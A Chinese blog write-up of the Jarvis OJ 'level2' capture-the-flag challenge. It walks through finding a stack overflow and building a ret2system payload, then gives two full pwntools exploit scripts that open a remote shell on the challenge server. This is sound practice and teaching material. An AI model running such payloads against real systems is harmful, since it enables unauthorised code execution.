Jarvis oj level2 wp

pwn 同时被 2 个专栏收录
23 篇文章 4 订阅

检查防护
在这里插入图片描述
开启了NX,没开启PIE和canary防护,程序本身的基址不变。

放IDA里看一下
在这里插入图片描述
程序本身调用了system函数,那么PLT表里就一定有这个函数。
看下vulner函数
在这里插入图片描述
很显然栈溢出。
IDA查找下字符串:
在这里插入图片描述
发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。
在这里插入图片描述
简单计算下,首地址是0x0804A024,

算下溢出点是多少
在这里插入图片描述
很显然0x88+0x4=140
那么就可以写exp了:
这个是自己找地址的写法,也可以直接用pwntools的ELF模块,下面还有一个直接用pwntools的ELF的 exp

from pwn import*

elf=ELF("level2.54931449c557d0551c4fc2a10f4778a1")

a=remote("pwn2.jarvisoj.com","9878")

a.recvuntil("Input:\n")

#system_addr=elf.symbols["system"]

#shell_addr=next(elf.search("/bin/sh"))

payload='A'*140+p32(0x08048320)+p32(0x1)+p32(0x0804A024)

a.send(payload)

a.interactive()

这个是用ELF模块的:

from pwn import*

elf=ELF("level2.54931449c557d0551c4fc2a10f4778a1")

a=remote("pwn2.jarvisoj.com","9878")

a.recvuntil("Input:\n")

system_addr=elf.symbols["system"]

shell_addr=next(elf.search("/bin/sh"))

payload='A'*140+p32(system_addr)+p32(0x1)+p32(shell_addr)

a.send(payload)

a.interactive()
  • 0
    点赞
  • 3
    评论
  • 3
    收藏
  • 打赏
    打赏
  • 扫一扫,分享海报

©️2022 CSDN 皮肤主题:书香水墨 设计师:CSDN官方博客 返回首页

打赏作者

dittozzz

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值